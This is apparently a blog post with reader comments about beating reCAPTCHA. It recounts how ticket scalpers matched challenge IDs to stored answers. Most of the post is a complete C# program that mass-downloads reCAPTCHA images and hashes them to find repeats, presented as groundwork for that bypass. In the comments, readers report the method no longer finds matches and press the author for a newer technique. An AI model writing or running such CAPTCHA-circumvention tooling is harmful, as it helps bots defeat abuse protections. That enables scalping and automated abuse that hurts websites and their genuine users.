[The perpetrators] wrote a script that impersonated users trying to access Facebook, and downloaded hundreds of thousands of possible CAPTCHA challenges from reCAPTCHA. They identified the file ID of each CAPTCHA challenge and created a database of CAPTCHA “answers” to correspond to each ID. The bot would then identify the file ID of a challenge at Ticketmaster and feed back the corresponding answer.
If the writer was referring to the ID passed to http://api.recaptcha.net/image via query string, the vulnerability appears to be fixed as the ID is temporary. However, the images are still the same and through the use of a cryptographic hash function such as MD5 we can identify duplicates. The following C# console application downloads a number (specified by the imageCount variable) of CAPTCHA images from reCAPTCHA, hashes each, groups the results by hash, then writes the results to a text file. Downloading as few as 1024 images can yield several identical images. Building on this one could potentially pull off the reCAPTCHA attack described in the article.
using System;
using System.Text;
using System.Text.RegularExpressions;
using System.IO;
using System.Net;
using System.Collections.Generic;
using System.Security.Cryptography;
namespace reCAPTCHAScrape
{
class Program
{
static string Request(string Url)
{
HttpWebRequest request = WebRequest.Create(Url) as HttpWebRequest;
string s;
using (StreamReader reader =
new StreamReader(request.GetResponse().GetResponseStream()))
s = reader.ReadToEnd();
return s;
}
static void GetCaptchaImage(int FileNum)
{
Regex scriptURLRegex =
new Regex(@"<script\s*type\s*=\s*""text/javascript""\s*" +
@"src\s*=\s*""([^""]+)""\s*><\s*/script>");
Regex scriptRegex = new Regex(@"challenge\s*:\s*'([^']+)'");
string pageURL = "http://recaptcha.net/fastcgi/demo/recaptcha";
string resp = Request(pageURL);
string scriptURL = scriptURLRegex.Match(resp).Groups[1].Value;
resp = Request(scriptURL);
string ID = scriptRegex.Match(resp).Groups[1].Value;
string imageURL = "http://api.recaptcha.net/image?c=" + ID;
HttpWebRequest request =
WebRequest.Create(imageURL) as HttpWebRequest;
byte[] buffer = new byte[1048576];
using (Stream s = request.GetResponse().GetResponseStream())
{
int len = s.Read(buffer, 0, 1048576);
Array.Resize(ref buffer, len);
}
using (FileStream stream = File.Create(FileNum + ".jpg"))
stream.Write(buffer, 0, buffer.Length);
}
static void DigestImages(string Path)
{
DirectoryInfo info = new DirectoryInfo(Path);
FileInfo[] files = info.GetFiles("*.jpg");
MD5CryptoServiceProvider md5 = new MD5CryptoServiceProvider();
Dictionary<string, List<FileInfo>> digestDictionary =
new Dictionary<string, List<FileInfo>>();
foreach (FileInfo f in files)
{
byte[] buffer = File.ReadAllBytes(f.FullName);
byte[] digest = md5.ComputeHash(buffer);
StringBuilder hexStringBuilder = new StringBuilder();
foreach (byte b in digest)
hexStringBuilder.Append(Convert.ToString(b,
16).PadLeft(2, '0'));
string hexString = hexStringBuilder.ToString();
if (digestDictionary.ContainsKey(hexString))
digestDictionary[hexString].Add(f);
else
digestDictionary.Add(hexString, new List<FileInfo>() { f });
}
StringBuilder results = new StringBuilder();
foreach (string s in digestDictionary.Keys)
{
results.AppendLine(s);
foreach (FileInfo f in digestDictionary[s])
results.AppendLine(f.FullName);
results.AppendLine();
}
string filename = @".\Results_" + Environment.TickCount + ".txt";
File.WriteAllText(filename, results.ToString());
}
static void Main(string[] args)
{
const int imageCount = 1024;
Console.Write("Downloading images");
for (int i = 0; i < imageCount; i++)
{
try
{
GetCaptchaImage(i);
Console.Write(".");
}
catch (System.Exception ex)
{
Console.WriteLine(ex.ToString());
}
}
Console.WriteLine("\r\nSearching for matches...");
DigestImages(@".\");
Console.WriteLine("Complete. Press any key to continue...");
Console.ReadKey();
}
}
}
A match in the output looks like this:
cf75401ef23c167260aa6d93bb7fbc42
C:\Source\reCAPTCHAScrape\reCAPTCHAScrape\bin\Debug\533.jpg
C:\Source\reCAPTCHAScrape\reCAPTCHAScrape\bin\Debug\869.jpg
I'm currently testing this (in php though), but it doesnt work.
ReplyDeleteAfter 2000 files, no matching :(
I just ran it again and didn't get any either. It looks like the fun might be over for now, although I have another method in mind.
ReplyDeleteHello John I read your comment about having a new new method in mind. I am interested in it . Would you mind posting an article or comment about it?
ReplyDeleteWhen I get some free time I'll post an article about it.
ReplyDeleteJohn you get that free time? Interested as well in any new techniques you have in mind
ReplyDelete